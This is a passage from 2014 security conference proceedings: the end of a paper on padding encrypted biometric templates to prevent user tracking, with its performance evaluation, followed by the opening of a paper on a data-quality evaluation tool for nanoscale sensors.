vectors. Correlations of biometric features are the main reason
for such clusters. Daugman [21] identifies the iris phase code
to be 0 or 1. This results in a Hamming distance with a
very small variance. Daugman uses 249 different features and
obtains µ = 0.499 and σ = 0.0317. There exist several
other analogous examples, e.g., in face recognition for the
distribution of eyes, nose, and mouth that are quite similar
for every person. We conclude that it is very likely that the
data in the feature space are not equally distributed.
With these insights or domain knowledge, it is possible to
link users or even track users as in our example in Figure 3. An
inclusion of the metadata of the database also enables further
possibilities for an information gain, e.g., in the case that an
index structure relates similar values, as the R-tree [22] or the
Pyramid technique [23].
We propose a padding approach. This is comparable to
salting. In Figure 4, we show the idea. Every user receives
a specific ID (UID). This ID is encrypted together with the
template, e.g., by concatenating ID and biometric feature. This
approach also allows including the feature index (FID) in the
pad which avoids intra-user overlapping.
Pad
UID
Biometric Feature
FID
Biometrics
Figure 4. Lead-Pad for Biometric Features, adapted from [8]
The resulting value of a pad and a biometric feature has
to be encrypted. A leading pad avoids any inter- and intrauser redundancies. At the same time, the possibility of the
above described attack is close to zero. The padding, seen as a
security layer, can be either maintained by the user or operated
by an additional participant who has paddings and IDs. This
proposal comes at the cost that identification is expected to be
more difficult. The pad shifts features semantically away from
others. Therefore, the Euclidean measurements for similarity
cannot be used, but the complete set of pads for each person
has to be processed. We concentrate on performance of our
proposed approach in the following.
B. Performance of the Pad Approach in the DBS
Index methods are widely used in DBMS to increase performance [24]. In relational databases, the B-tree [25] [26] and
variants, such as the B+-tree. are used to achieve a logarithmic
lookup performance. A similarity search using B+-trees results
on average in a linear performance overhead additionally.
Including a verifier, as proposed in an encrypted data domain,
influences the processing time due to transportation effort. We
discuss pros and cons in the following.
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
TABLE I. P ERFORMANCE IN A DATABASE S YSTEM AND COMPARED TO
THE PADDING A PPROACH
Query Type
Exact Match
Similarity Search
DBS with B+-tree
O(log(n))
O(n)
Padding DBS
O(n)
O(n)
Sorting and the use of metadata, which can improve query
response times, should be avoided for security reasons. This
requirement is in contrast to typically used index structures
in relational data management systems. Therefore, the identification within the authentication process requires linear computational effort. Depending on the size and the application
scenario, different metadata, such as gender, can be utilized
to limit this effort. Note, if small subsets can be created from
this metadata, it is necessary to separate these from biometrics.
Alternatively, the padding approach can be applied to nonbiometrics, too. In Table I, we summarize the computational
efforts for a relational database and also for a database with
encryption using our padding approach. Due to several other
possible performance impacts, such as database size, feature
size, thresholds, or key bit-length, we present in Section V a
short evaluation study.
1) Implementation Issues: We propose to use a distance
result from the verifier instead of a binary decision of acceptance or decline of an authentication attempt. Besides
a reasonable attack scenario, where learning from accepted
authentications and repeated authentication queries is possible
in the later scenario, this risk can be reduced by disabling
repeated authentication. In our approach, the quality of the
similarity can be computed in an evaluation step. We apply
the following formula:
Pdim
a
|xi − yi |
d (X, Y ) = i=1a
(2)
τ · dim
with threshold τ , a ≥ 1 as degree of freedom, and dim as
dimensionality of the feature vector. These parameters are
important for adjusting quality regarding sensor accuracy, error
rates, and the biometric trait. The better the quality, the lower
can be τ and the larger a.
We use a dictionary to maintain all pads for all enrolled
users. The pads are delivered via a secure channel for each
authentication process. The pads are concatenated before encryption. Due to the non-existence of relations to personal
data, the pads can be generated randomly. The necessary step
before enrollment or authentication is adding the pad. Note, it
is not necessary to add the pad before the signal. Within an
identification process, it is necessary to lookup the dictionary
for the pad of a user. If outsourcing the dictionary to an
external server, a processing time increase has to be respected.
In the following, we consider the three participant approach,
for other system architectures from Section III. We measure
the influence of computation time regarding all three involved
participants. Note, if participants are embedded, as described
in Section III, special security requirements have to be met.
The three participants consist of a user, a verifier, and the
114
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
DBS, which maintains the encrypted templates. Biometrics are
taken by a sensor at user side. The verifier is responsible for
authentication. Note, communication channels can be realized
in different ways, such as insecure or with encryption. In the
case, that only the user stores all pads to corresponding IDs,
verifier and DBS do not need to be fully trusted. Hill-climbing
should be avoided and therefore, a repeated authentication
from single users has to be disabled. As a result, we can sum
up that applying our approach to this scenario, only the user
and partly the server gain information on the claimed identity.
The ability to learn from the results can only be realized on
user or verifier side. There is no plain information, due to
encryption at user side within the complete process.
C. Security Impacts
In our experiments, we do not focus on crypto-analyzes.
Since data are kept in the DBS, this is a promising entry point
to gain information. A careful design and a proper security
concept are mandatory. Implementation can cause vulnerabilities to the protocol that can lead to information leakage.
There are some attacks, which do not immediately address the
protocol. For instance, there are attacks on availability and the
endpoint should be carefully considered.
An attacker can try to take advantage of vulnerability that
originated from poor system design. For example, a system
designer decides to embed the verifier at user side, but does not
meet all steps to guarantee confidentiality. If an unauthorized
user is able to listen to the verifier, an information leakage
occurs.
In the case our padding approach is implemented inappropriate, e.g., without secure separation from unauthorized users,
and an attacker gains access to the pads, the confidentiality
is at risk. With access to the pads and the encrypted signal,
known-plain-text attacks [27] are possible.
The asymmetric Paillier cryptosystem is not informationtheoretically secure. Thus, there are threats leading to leakage
of the biometric templates in the DBS. We introduce a padding
approach to avoid opportunity of such attacks. Note, a secure
dictionary is mandatory. The implementation of a system
can enable various security vulnerabilities. These enable an
attacker to gain trusted information. It is mandatory to implement a proper pseudonymization approach in combination
with a secure dictionary.
The configuration of a system is presumably the most
promising path for an attacker. The DBS amount and type of
meta-information can be a threat to security. System designers
have to carefully consider meta-information. Additionally,
backups play an important role. With access to both, DB and
backup, an attacker subtracts users from backup and current
state for user tracking.
Acceptance threshold and quality classes influence false
acceptance and false rejection rates. The threshold decides
on size of error patterns. There are many additional factors:
level of information confidentiality, quality of the signals,
access frequency, expectations regarding response times, and
combined biometrics.
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
If the authentication protocol uses web communication, a
denial of service attack (DoS) can disturb the protocol from
functioning and harms availability. Even without using the
web, there are other possible attacks that are not only taking
advantage of communication. For instance, using malware
to prevent participants from following the protocol is an
imaginable attack on availability. Assuming that a biometric
authentication scheme applies the Four Participants scenario,
a DoS attack on the disguise would prevent the system’s
functioning. It is possible to reduce the threat, but impossible
to prevent it completely.
Endpoint security is crucial to provide confidentiality, especially if users have access to secret keys. Assuming the secret
key is not as easily accessible, an attacker can try to read
parts of communications. This includes plain and encrypted
data such as pads. Assessing these data, follow-up attacks like
known-plain or known cipher text attacks [27] are possible. For
a restriction, basic security steps, including anti-virus software
and firewalls, should be implemented.
V. E VALUATION
In this section, we present evaluation results on performance
for our approach. We evaluate processing time as performance
metric. For our evaluation, we present experiments regarding
different influence factors, such as enrolled users, key length,
feature vector dimension, and thresholds. Firstly, we explain
the evaluation setting. Secondly, we show results of our
performance evaluation with respect to enrolled users, key
length, feature dimensions, and threshold by studying with
and without-padding approaches and encrypted versus nonencrypted scenarios.
A. Experimental Layout
For our evaluation, we use a MySQL database, version
5.5.27. We restrict our evaluation to a two table layout with
index structures as follows:
• Person( Name, Security level, Department, ID)
• Biometrics(Feature, ID, BID).
Every enrolled person in the system has some attributes, i.e.
a name, a security level, and a department. These attributes
can be exchanged or extended by any property. In addition,
every person has an ID to find a data tuple unambiguously.
All properties like name, security level and department are
encrypted with the public key. Biometrics are divided by the
count of dimensions of the Euclidean vector. Every feature
is identified by a biometric ID (BID), while biometrics are
assigned to the corresponding person by an ID.
We make the following assumptions: The DBS is designed
that it can be used for most common discrete biometric
features. The resolution or the quality of the feature has no
influence on the operative readiness of the biometric system
itself. How accurate the resolution has to be is a question
of acceptable error rates and needs to be adjusted by the
corresponding use case. Features are saved in feature vectors
and have a minimum of at least one dimension and can have
as many dimensions as needed. Everything that depends on
115
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
the dimension of the feature vector grows corresponding to its
size. For example, the codebooks are depending on the size
of the feature vector.
B. Performance Evaluation
We perform all experiments on an AMD Phenom II X6
1055T Processor, an SSD, and 8GB RAM. In our evaluation,
we focus on response time as crucial performance factor.
We apply 10 replications per evaluation run for validity. We
use artificial data that we i.i.d. generated from Gaussian
distribution.
TABLE II. P ERFORMANCE FOR U SERS
Users
20
1,000
100,000
Identification
in ms
35
63
354
Verification
in ms
87
107
354
First, we test for size of enrolled users. Note, for simplicity,
feature length is 11 dimensions, key size is 64bit, and threshold
is 3. In Table II, we present arithmetic means for identification
and verification for our padding approach. Our results indicate
that the overall processing increases with a higher amount of
enrolled users. This growth seems linear. Memory management and thread scheduling or configuration and running the
DBS cause this increase. Since verification only requires data
of one person, the increase is not similar to identification. Due
to B+-trees in MySQL, there is an increasing impact according
to the size of enrolled users.
TABLE III. P ERFORMANCE FOR K EY L ENGTH
Key
Length
64
128
512
1,024
Identification
in ms
63
112
1001
6933
Verification
in ms
107
87
400
2188
In Table III, we present results regarding key length. Note,
we use 1,000 enrolled users in the DBS and a feature dimensionality of 11. As expected, an exponential growth with an
increase of the key length is obvious. Due to our experimental
setup (using one machine for all tasks), this growth might be
influenced in our experimental setup. However, using a private
key only increases the processing time in a small amount. A
fast feedback is a user requirement for user acceptance of
biometric authentication.
We test different feature vector sizes (11, 69, 100, 250, and
2,048) and present the results in Table IV. Adding new features
to the feature vectors requires more comparisons, which result
in higher response times. Note, with an increase of the feature
vector the codebooks also increase. Due to this, the growth in
smaller feature vectors can be explained.
As a last evaluation parameter, we vary the threshold from 3
to 1,000 and present our results in Table V. The threshold parameter is used for quality reasons, see Section IV. Compared
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
TABLE IV. F EATURE D IMENSIONS P ERFORMANCE
Feature
Dimensions
11
69
100
250
2,048
Identification
in ms
63
239
354
693
1,065
Verification
in ms
56
81
321
571
860
TABLE V. P ERFORMANCE FOR T HRESHOLD
Threshold
3
5
10
100
1,000
Identification
in ms
125
199
216
280
1,572
Verification
in ms
99
104
114
208
1,311
to [18], increasing the threshold by 1 means that two additional
comparisons have to be computed. Therefore, the increase
is linear with the number of enrolled users. Signals with a
higher fluctuation, which require a larger range of validity,
require more processing time. This has to be examined for each
application and evaluated regarding hardware, requirements,
and accuracy.
TABLE VI. P ERFORMANCE REGARDING T HRESHOLD
System Parameters
1,000 users, 2,048 features, 64 bit
1,000 users, 11 features, 1,024 bit
100,000 users, 11 features, 64 bit
Padding Approach
in ms
25,546
28,033
35,009
Without Pad
in ms
26,014
27,197
35,403
As a concluding remark, we present our evaluation results
regarding our approach compared to the approach presented in
[18]. In Table VI, we show three different parameter scenarios
exemplary. This table shows unexpected results. In the first and
third experiment, the response times for the padding approach
are slightly lower than without padding. This might be a
result from caching and optimizations that take place in the
experiments. However, our results show, the influences of our
approach are negligible.
TABLE VII. C OMPARISON OF S ECURE I DENTIFICATION
Enrolled
Users
20
1,000
100,000
Encrypted
Identification
35 ms
63 ms
354 ms
Unencrypted
Identification
26 ms
47 ms
310 ms
In the last setting, we show differences between encrypted
and unencrypted identification in Table VII. We use again a
key length of 64bit and 11 feature dimensions. The threshold
is set to 3. The results show the cost for encryption. Note, we
only use a very small computation effort regarding encryption
due to a very short key length. With an increase of the key
length the difference for both scenarios increases dramatically.
116
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
VI. S UMMARY AND O UTLOOK
In this paper, we present an extension to the secure and
similarity verification between homomorphically encrypted
signals by Rane [17], [18]. Tracing users is possible in the
original scenario. We present a padding approach, to overcome
this challenge. We extend the original contribution to search
on encrypted values and to use a one-time-pad-concept. Furthermore, we develop a evaluation study of our conceptual
design to evaluate our approach.
With the padding approach, an advanced search in an
encrypted domain is possible. However, if repeated authentication attempts are possible, it is already possible to gain
information regarding the template. One can avoid such template reproduction by disabling repeated authentications. Our
approach improves data security. We name some security
requirements for this purpose.
Processing times in our evaluation reveal that our padding
approach comes at very low additional cost compared to [18].
This is an important aspect for user acceptance of such a
system. Whereas the size of enrolled users has logarithmic
impact on computational effort, the key length impacts with an
exponential scheme. The dimensions of the feature vector have
logarithmic influence as well and the threshold is linear in the
computational effort. All these parameters do not drastically
influence the system of Rane [18]. Due to simple operations,
such as summation and amount computation, computational
overhead is negligible. However, concept of privacy-preserving
authentication, discussed in this paper, has a strong influence
on computational effort compared to plain-text biometric authentication systems.
In future work, our approach can be adapted for other
domains. We propose to semantically shift data to complicate
unauthorized decryption attempts, which makes user tracing
via duplicate identification unlikely. Particularly, this becomes
important, if the co-domain of the biometric feature is smaller
than the co-domain of the key. The approach presented in [28]
verifies users in the encrypted domain. It is imaginable that
the extensions are of interest, too, for this approach, which
bases on the homomorphic cryptosystem RSA.
ACKNOWLEDGMENT
We thank Martin Schäler for fruitful discussions on the
first draft of this paper. The work in this paper has been
funded in part by the German Federal Ministry of Education
and Research (BMBF) through the Research Program ”DigiDak+ Sicherheits-Forschungskolleg Digitale Formspuren” under Contract No. FKZ: 13N10816 and 13N10818.
R EFERENCES
[1] A. Grebhahn, M. Schäler, and V. Köppen, “Secure deletion: Towards
tailor-made privacy in database systems,” in BTW-Workshops. KöllenVerlag, 2013, pp. 99–113.
[2] A. Grebhahn, M. Schäler, V. Köppen, and G. Saake, “Privacy-aware
multidimensional indexing,” in BTW. Köllen-Verlag, 2013, pp. 133–
147.
[3] C. Vielhauer, Biometric User Authentication for IT Security, ser. Advances in Information Security. Springer, 2006, no. 18.
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
[4] M. Schäler, A. Grebhahn, R. Schröter, S. Schulze, V. Köppen, and
G. Saake, “QuEval: Beyond high-dimensional indexing à la carte,”
PVLDB, vol. 6, no. 14, 2013, pp. 1654–1665.
[5] F. Emekci, O. Sahin, D. Agrawal, and A. E. Abbadi, “Privacy preserving
decision tree learning over multiple parties,” DKE, vol. 63, no. 2, 2007,
pp. 348 – 361.
[6] A. Inan, Y. Saygyn, E. Savas, A. Hintoglu, and A. Levi, “Privacy preserving clustering on horizontally partitioned data,” in Data Engineering
Workshops, 2006. Proceedings. 22nd International Conference on, 2006,
pp. 95–95.
[7] D. Shah and S. Zhong, “Two methods for privacy preserving data mining
with malicious participants,” Information Sciences, vol. 177, no. 23,
2007, pp. 5468–5483.
[8] M. Leuckert, “Evaluation and extension of secure similarity verification
in multi-computer scenarios to sesecure store and communicate biometric data,” Master’s thesis, Otto-von-Guericke University, 2013.
[9] P. Paillier, “Public-key cryptosystems based on composite degree residuosity classes,” in EUROCRYPT, ser. Lecture Notes in Computer Science,
J. Stern, Ed., vol. 1592. Springer, 1999, pp. 223–238.
[10] C. Vielhauer, J. Dittmann, and S. Katzenbeisser, “Design aspects of
secure biometric systems and biometrics in the encrypted domain,” in
Security and Privacy in Biometrics, P. Campisi, Ed. Springer, 2013,
pp. 25–43.
[11] S. Kiltz, A. Lang, and J. Dittmann, “Taxonomy for computer security
incidents,” in Cyber Warfare and Cyber Terrorism. IGI Global, 2008,
pp. 412–417.
[12] S. Hildenbrand, D. Kossmann, T. Sanamrad, C. Binnig, F. Faerber, and
J. Woehler, “Query processing on encrypted data in the cloud,” Systems
Group, Department of Computer Science, ETH Zurich, Tech. Rep., 2011.
[13] A. Juels and M. Wattenberg, “A fuzzy commitment scheme,” in 6th
ACM Conference on Computer and Communications Security. New
York, NY, USA: ACM, 1999, pp. 28–36.
[14] A. Juels and M. Sudan, “A fuzzy vault scheme,” Designs, Codes and
Cryptography, vol. 38, no. 2, 2006, pp. 237–257.
[15] A. K. Jain, A. Ross, and U. Uludag, “Biometric template security: Challenges and solutions,” in In Proceedings of European Signal Processing
Conference, 2005.
[16] C. Gentry, “Computing arbitrary functions of encrypted data,” Commun.
ACM, vol. 53, no. 3, 2010, pp. 97–105.
[17] S. Rane, W. Sun, and A. Vetro, “Secure similarity verification between
encrypted signals,” US Patent US20 100 246 812 A1, Sep. 30, 2010.
[18] ——, “Secure similarity verification between homomorphically encrypted signals,” US Patent US8 249 250 B2, Sep. 30, 2012.
[19] P. Stahlberg, G. Miklau, and B. N. Levine, “Threats to privacy in
the forensic analysis of database systems,” in Proceedings of the 2007
ACM SIGMOD International Conference on Management of Data, ser.
SIGMOD ’07. New York, NY, USA: ACM, 2007, pp. 91–102.
[20] A. Grebhahn, D. Broneske, M. Schäler, R. Schröter, V. Köppen, and
G. Saake, “Challenges in finding an appropriate multi-dimensional
index structure with respect to specific use cases,” in Proceedings
of the 24th GI-Workshop ”Grundlagen von Datenbanken 2012”,
I. Schmitt, S. Saretz, and M. Zierenberg, Eds. CEUR-WS,
2012, pp. 77–82, urn:nbn:de:0074-850-4. [Online]. Available: http:
//ceur-ws.org/Vol-850/paper grebhahn.pdf
[21] J. Daugman, “How iris recognition works,” IEEE Trans. on Circuits and
Systems for Video Technology, vol. 14, no. 1, 2004, pp. 21–30.
[22] A. Guttman, “R-trees: A dynamic index structure for spatial searching,”
SIGMOD Rec., vol. 14, no. 2, 1984, pp. 47–57.
[23] S. Berchtold, C. Böhm, and H.-P. Kriegel, “The Pyramid-technique:
Towards breaking the curse of dimensionality,” SIGMOD Rec., vol. 27,
no. 2, 1998, pp. 142–153.
[24] V. Köppen, M. Schäler, and R. Schröter, “Toward variability management to tailor high dimensional index implementations,” in RCIS. IEEE,
2014, pp. 452–457.
[25] R. Bayer and E. McCreight, “Organization and maintenance of large
ordered indexes,” Acta Informatica, vol. 1, 1972, pp. 173–189.
[26] D. Comer, “The Ubiquitous B-Tree,” ACM Comput. Surv., vol. 11, no. 2,
1979, pp. 121–137.
[27] B. Schneier, Secrets & Lies: Digital Security in a Networked World.
New York, NY, USA: John Wiley & Sons, Inc., 2000.
[28] M. Upmanyu, A. M. Namboodiri, K. Srinathan, and C. V. Jawahar, “Efficient biometric verification in encrypted domain,” in 3rd International
Conference on Advances in Biometrics, 2009, pp. 899–908.
117
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
Data Quality and Security Evaluation Tool for Nanoscale Sensors
Leon Reznik
Sergey Edward Lyshevski
Department of Computer Science
Rochester Institute of Technology
Rochester, New York, USA
e-mail: lr@cs.rit.edu
Department of Electrical and Microelectronic Engineering
Rochester Institute of Technology
Rochester, New York, USA
e-mail: Sergey.Lyshevski@mail.rit.edu
Abstract— The paper proposes a novel approach to data and
information management in multi-stream data collection
systems with heterogeneous data sources. Data may be
produced by novel nanoscale photonic, optoelectronic and
electronic devices. Poor quality characteristics are expected. In
the proposed approach, we use a set of data quality indicators
with each data entity, and, develop the calculus that integrates
various data quality (DQ) indicators ranging from traditional
data accuracy metrics to network security and business
performance measures. The integral indicator will calculate
the DQ characteristics at the point of data use instead of
conventional point of origin. The DQ metrics composition and
calculus are discussed. The tools are developed to automate the
metrics selection and calculus procedures for the DQ
integration is presented. The user-friendly interactive
capabilities are illustrated.
The importance of DQ analysis, data enhancements and
optimization is emphasized due to: (1) Low signal-to-noise
ratio (ratio of mean to standard deviation of measured
signals is ~0.25 in the emerged electrons-photons
interaction devices); (2) High probability of errors (p is
~0.001); (3) High distortion measure, reaching ~0.1 to 0.3;
(4) Dynamic response and characteristic non-uniformity.
These characteristics must be measured, processed and
evaluated and provided to a data used along with the data.
New generations of information systems provide
communication and networking capabilities to transfer, fuse,
process and store data. Various applications require the data
delivery from their origin to the point of use that might be
far away. The data transfer may lead to information losses,
attenuation, distortions, errors, malicious alterations, etc.
Security, privacy and safety aspects of data communication
and processing systems nowadays play a major role and
may have a dramatic effect on the quality of data delivered.
New DQ management methods, quality evaluation and
assurance (QE/QA) tools and robust algorithms are needed
to ensure security, safety, robustness and effectiveness. As
the amount of data available multiplies every year, current
information systems are not capable to process these large
data arrays to make the best decision. Big data applications
require better data selection of high quality inputs. The
absence of DQ indicators provided along with the data
hinders the recognition of potential calamities and makes
data fusion and mining procedures as well as decision
making prone to errors.
In this paper we offer a novel approach to the data
management in information systems. We propose to
associate the DQ indicators with each data entity, and,
replace one-dimensional data processing and delivery with
multi-dimensional data processing and delivery along with
the corresponding DQ indicators. To realize this approach,
we describe the structure and content of these DQ indicators,
develop the calculus of processing, and, develop interactive
tools to automate this process. The current situation in DQ
research is described in Section II. The DQ metrics
composition is presented in Section III, while the DQ
calculus is reported in Section IV. The CAD tools are
documented in Section V. The conclusions are outlined in
Section VI.
Keywords - data quality; computer security evaluation;
data accuracy; data fusion.
I.
INTRODUCTION
Recently we entered a new era of an exponential growth
of data collected and made available for various
applications. The existing technologies are not able to
handle such big amounts of data. This phenomenon was
called the big data. Photonics and nanotechnology enabled
microsystems perform multiple generations and fusions of
multiple data streams with various data quality [1-6]. The
development and application of quantum-mechanical
nanoscale
electronic,
photonic,
photoelectronic
communication,
sensing
and
processing
devices
significantly increase an amount of data which can be
measured and stored. These organic, inorganic and hybrid
nanosensors operate on a few photons, electrons and
photon-electron interactions [1, 2, 4, 6]. Very low current
and voltage, high noise, large electromagnetic interference,
perturbations, dynamic non-uniformity and other adverse
features result in heterogeneous data with high uncertainty
and poor quality. The super-large-density quantum and
quantum-effect electronic, optoelectronic and photonic
nanodevices and waveguides are characterized by: (i)
Extremely high device switching frequency and data
bandwidth (~1000 THz); (ii) Superior channel capacity
(~1013 bits); (iii) Low switching energy (~10–17 J) [7, 8].
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
118
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
II.
CURRENT ENVIRONMENT AND ACHIVEMENTS IN DQ
EVALUATION
DQ represents an open multidisciplinary research
problem, involving advancements in computer science,
engineering and information technologies. The studied
problems are directly applicable in various applications. It is
essential to develop technologies and methods to manage,
ensure and enhance quality of data. Related research in a
networking field attempts to investigate how the network
characteristics, standards and protocols can affect the quality
of data collected and communicated through networks. In
sensor networks, researchers started to investigate how to
incorporate DQ characteristics into sensor-originated data
[9]. Guha et al. proposed a single-pass algorithm for highquality clustering of streaming data and provided the
corresponding empirical evidence [10]. Bertino et al.
investigated approaches to assure data trustworthiness in
sensor networks based on the game theory [11] and
provenance [12]. Chobsri et al. examined the transport
capacity of a dense wireless sensor network and the
compressibility of data [13]. Dong and Yinfeng attempted to
optimize the quality of collected data in relation to resource
consumption [14],[15]. Current developments are based on
fusing multiple data sources with various quality and
creating big data collections. Novel solutions and
technologies, such as nano-engineering and technology are
emerged in order to enable DQ assessment. Reznik and
Lyshevski outlined integration of various DQ indicators
representing different schemes ranging from measurement
accuracy to security and safety [16], as well as micro- and
nano engineering [17]. The aforementioned concepts are
verified, demonstrated and evaluated in various engineering
and science applications [18],[19].
III.
DQ METRICS COMPOSITION
Data may have various quality aspects, which can be
measured. These aspects are also known as data quality
dimensions, or metrics. Traditional dimensions are as
follows, some of them are described in [20],[21]:
Completeness: Data are complete if they have no missing
values. It describes the amount, at which every expected
characteristic or trait is described and provided.
Timeliness: Timeliness describes the attribute that data
are available at the exact instance of its request. If a user
requests for data and is required to wait a certain amount
of time, it is known as a data lag. This delay affects the
timeliness and is not desirable.
Validity: It determines the degree, at which the data
conforms to a desired standard or rules.
Consistency: Data are consistent if they are free from any
contradiction. If the data conforms to a standard or a rule,
it should continue to do so if reproduced in a different
setting.
Integrity: Integrity measures how valid, complete and
consistent the data are. Data’s integrity is determined by a
measure of the whole set of other data quality aspects /
dimensions.
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
Figure 1. Integral quality evaluation composition
Accuracy: Accuracy relates to the correctness of data and
measurement uncertainty. Data with low uncertainty are
correct.
Relevance: It is a measure of the usefulness of the data to
a particular application.
Reliability: The quality of data becomes irrelevant if the
data are not obtained from a reliable source. Reliability is
a measure of the extent, to which one is willing to trust the
data.
Accessibility: It measures the timeliness of data.
Value added: It is measured as the rate of usefulness of
the data.
The methodologies of evaluating the DQ aspects listed
above have been developed over the decades. They well
represent the quality of the data at the point of their origin at
the data source. However, nowadays most of the data are
used far away from the point of their origin. In fact, the
structured data are typically collected by distributed sensor
networks and systems, then transmitted over the computer
and communication networks, processed and stored by
information systems, and, then, used. All those
communication, processing and storage tasks affect the
quality of data at the point of use, changing their DQ in
comparison to one at the point of origin. The DQ evaluation
should integrate accuracy and reliability of the data source
with the security of the computer and communication
systems. The high quality of the data at the point of their
origin does not guarantee even an acceptable DQ at the
point of use if the communication network security is low
and the malicious alternation or loss of data has a high
probability.
We describe the DQ evaluation structure as a multilevel
hierarchical system. In this approach, we combine diverse
evaluation systems, even if they vary in their design and
implementation. The hierarchical system should be able to
produce a partial evaluation of different aspects that will be
helpful in flagging the areas that need urgent improvement.
In our initial design we will classify metrics into five groups
(see Figure 1):
119
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
Generic
Attribute
Name
Time-sinceManufacturing
Time-sinceService
Time-sinceCalibration
Temperature
Range
Physical
Tampering
Incidences
System
Breaches
System
Security
Data Integrity
Environmental
Influences
Atmospheric
Influences
Response
Time
TABLE I.
DQ indicator/group
(Figure1)
SAMPLES OF GENERIC METRICS
Description
Maintenance/reliability
The measure of the age of the device
Maintenance/reliability
The measure of the days since last service was performed in accord with
the servicing schedule
The measure of the days since last calibration was performed in accord
with the calibration schedule
The measure of temperature range within which the device will provide
optimum performance
The number of reported incidents that allowed unauthorized physical
contact with the device
Calibration/reliability
Application/performance
Physical security/security
Access control/security
Security/security
Vulnerabilities/securities
Environment/environment
Environment/environment
Signals/reliability
The measure of the number of unauthorized accesses into the system,
denial of service attacks, improper usage, suspicious investigations,
incidences of malicious code.
Measures presence of intrusion detection systems, firewalls, anti-viruses.
Number of operating system vulnerabilities that were detected.
Number of incidences reported that would subject the device to
mechanical, acoustical and triboelectric effects.
Number of incidences reported that would subject the device to
magnetic, capacitive and radio frequencies.
Time between the change of the state and time taken to record the change
TABLE II. SAMPLES OF SPECIFIC DQ METRICS (EXAMPLES OF ELECTRIC POWER AND WATER METERS)
Device Name
Application specific
Description
Quality indicator
Electric /
Foucalt Disk
Check to verify the material of the foucalt disk.
Power Meters
Friction
Difference in the measure of initial friction at the time of application of the
Compensation
compensation and the current friction in the device.
Exposure to
Measure of the number of incidences reported which would have caused the
Vibrations
device to be subjected to external vibrations
Water Meters
Mounting Position
The measure of the number of days since regulatory check was performed to
observe the mounting position of the device.
Environmental
Number of incidences reported which may have affected the mounting
Factors
position of the device.
Particle Collection
Measure of the amount of particle deposition.
(1) Accuracy evaluation;
(2) measurement and reliability evaluation;
(3) security evaluation;
(4) application functionality evaluation;
(5) environmental impact.
While the first three groups include rather generic metrics,
groups #4 and #5 are devoted to metrics, which are specific
to a particular application. Our metrics evaluation is based
on existing approaches and standards, such as [22] for
measurement accuracy and [23] for system security. Table I
gives a sample of generic metrics representing all first three
groups, while Table II lists the metrics, which are
considered specific to a particular sensor and an application.
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
IV.
DQ METRICS CALCULUS
In DQ calculus implementation we plan to investigate a
wide number of options of calculating integral indicators
from separate metrics ranging from simple weighted sums
to sophisticated logical functions and systems. Those
metrics and their calculation procedures will compose the
DQ calculus. To simplify the calculus, we organize it as a
hierarchical system calculating first the group indicators and
then combining them into the system total. We follow the
user-centric approach by offering an application user a
choice of various options and their adjustment. We plan to
introduce a function choice automatic adjustment,
120
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
verification and optimization.
To realize a wide variety of logical functions, the expert
system technology is employed as the main implementation
technique. The automated tool set includes the hierarchical
rule-based systems deriving values for separate metrics,
then combining them into groups and finally producing an
overall evaluation. This way, the tool operation follows up
the metrics structure and composition (see figure 2). This
system needs to be complemented by the tools and
databases assisting automation of all stages in the data
collection, communication, processing and storage for all
information available for data quality evaluation. The
developed
tools
facilitate
automated
collection,
communication and processing of the relevant data. Based
on the data collected, they not only evaluate the overall data
quality but also determine whether or not the data collection
practice in place is acceptable and cite areas that are in need
of improvement.
In our automated procedures, the DQ score is computed
by applying either linear, exponential or stepwise linear
reduction series to the maximum score of an attribute. In
case an attribute defines a range for ideal working, the linear
series is substituted by a trapezoidal drop linear series and
exponential is replaced by a bell drop series.
When considering both accuracy and security DQ metrics,
assessing whether fusion enhances DQ is not obvious as one
has to tradeoff between accuracy, security and other goals.
While adding up a more secure data transmission channel
improves both security and accuracy indicators, using a
more accurate data stream will definitely improve data
accuracy but could be detrimental to certain security
indicators (see [24] for further discussion). If resources are
limited, as in the case of sensor networks, one might
consider trying to improve accuracy of the most secure data
source versus more or less even distribution of security
resources in order to achieve the same security levels on all
data channels. The concrete recommendations will depend
on the application.
V.
Figure 2. Data quality evaluation procedure
Figure 3. Generic attribute configuration
GENERIC TOOL DESIGN
The proposed design of the tool divides the procedure for
automated data collection in three main stages. First stage
involves mainly a device configuration. Since the tool is
generic, it provides certain flexibility in configuring a large
variety of diverse devices. These devices could be electric
meters, power meters, water meters and marine sensors. The
second stage computes data quality indicators of the
configured device. The final stage performs the detailed
analysis of the computed data quality indicators. It
highlights low data quality and help flag erroneous data.
Also, it provides recommendations on improving low data
quality and help ensure that the data being utilized are fit for
the purpose it is intended to be used. Figure 2 presents the
architecture of the tool. Currently, the first and the second
stages are implemented.
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
F igure 4. A pplication specific attribute c onfiguration
121
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
The generic tool allows for a configuration of a large
variety of devices. Each automated data collection device
has DQ factors, which are common to other similar devices.
These factors are referred by the tool as generic attributes.
Other attributes, which are unique to a particular device are
called dynamic attributes. These attributes are assigned the
maximum score based on the significance of the
contribution they would add to the data quality. The greater
the significance, the greater is the score.
The configuration step mainly involves recognizing the
generic and application-specific attributes, as well as
assigning the max possible score to each of them. Generic
attributes are common to most devices, for example,
timeliness and quality of common device servicing such as
calibration. Application-specific attributes are unique to a
device, for example, exposure to vibration, shock and
radiation. This is important for a particular application
because certain devices, like electric meters, produce
misleading results when exposed to the external adversary
affects. If, for some reason, a generic attribute does not
apply to a particular device, the max score of zero would be
applied in order to eliminate the attribute from the analysis.
Table I describes the generic attributes being considered by
the tool. Figure 3 illustrates configuring some of the generic
